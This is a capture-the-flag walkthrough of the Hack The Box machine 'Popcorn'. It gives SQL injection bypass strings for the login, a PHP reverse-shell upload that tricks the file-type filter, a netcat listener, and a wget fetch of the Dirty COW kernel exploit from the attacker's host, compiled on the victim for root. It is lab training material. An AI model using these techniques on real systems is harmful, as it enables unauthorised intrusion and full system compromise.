HTB - Popcorn

Linux | Burpsuite | SQLi |

Tools For This Room

  • Burpsuite - this tool will be used in a SQLi authentication bypass and file upload

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold with SQLi login and reverse shell upload

  3. Privesc through kernel exploit

Scanning & Enumeration

We kick off with the customary nmap scan

  • Nmap 

nmap -sV -sC -vv <IP>

The following ports are open 22: SSH 80: HTTP

We also run a full port scan, but no further open ports are discovered. Checking out the site at port80 doesn't give us anything interesting either. Let's turn to gobuster.

  • gobuster

gobuster dir -u http://<IP> -w <wordlist>

We get a couple of interesting directories like /torrent and /cgi-bin/. The /cgi-bin/ directory is particularly interesting as we've seen this in another HTB room called Shocker which uses the Shellshock exploit.

Shameless plug for my HTB walkthrough on Shocker here.

Unfortunately, checking out the /cgi-bin/ directory only yields the page above. Let's see what /torrent gives us instead.

After poking around the Torrent Hoster, we find a login page:

Unfortunately, the usual array of username/password combinations don't work. However, upon inputting the SQL injection of ' or 1=1 into both username and password, we get the following response:

This could be a hint that its vulnerable to a SQLi authentication bypass.

Gaining Foothold

Pulling up Burpsuite, we'll use it to determine if a SQLi authentication bypass is possible.

First, we'll turn on Foxy Proxy, then submit any input in the fields. Then we'll move over to Burpsuite's Proxy tab to send the input over to Intruder. In the Positions section in Intruder, we'll Clear § then Add § where the username and password fields are. We'll also set the Attack type to Pitchfork, since we are attacking 2 fi

Under Payloads in the Intruder tab, we'll load a list of possible SQLi bypass, which we can get from here. Now we'll run the attack and discover that admin' # gives a different status code, which means it could get us login.

We try it and we're logged in as admin!

Now that we're logged in, let's find a way to upload a reverse shell and trigger it. Let's set up a netcat listner first.

nc -lvnp <port>

After some browsing around, we find a file called Kali Linux which we can edit. Clicking on it gives us this page where we can upload a screenshot for the thumbnail.

Let's set up a .php reverse shell file which we can get from here. Once we've edited the file to reflect our IP and preferred port, we need to upload it. However, the site states that only jpg, jpeg, gif, and png formats are acceptable, but we need our file to be in php format.

First, let's rename our file "shell.php.jpg". Then let's pull up our trusty Burpsuite again. Upon uploading the file, we see this.

Under filename, we'll amend "shell.php.jpg" to "shell.php", then we'll hit Forward and send it through.

Refreshing the page gives us this page:

Right clicking the "Image File Not Found" button and opening it in a new tab gives us a shell!

After some poking around, we get the user.txt.

Privilege Escalation

We run the usual array of privesc checks, but nothing comes up. However, when we check the kernel version with "uname -a", we find that its 2.61.31-14. A quick searchsploit check on this gives us some possible exploits:

After a quick Google search, we land on 40839 being the first candidate. So let's copy it to our working directory, and set up a server.

searchsploit -m linux/local/40839.c
python -m SimpleHTTPServer

Now let's pull it over to our victim machine with wget.

wget <ourIP>:<port>/40839.c

If we examine the file, it provides us commands to compile the C file and execute it.

gcc -pthread 40839.c -o dirty -lcrypt
chmod +x dirty
./dirty

Now let's switch users to the newly created firefart, and we are root!

Let's grab that root flag and call it a day.

PreviousHTB - JarvisNextHTB - Access

Last updated

Was this helpful?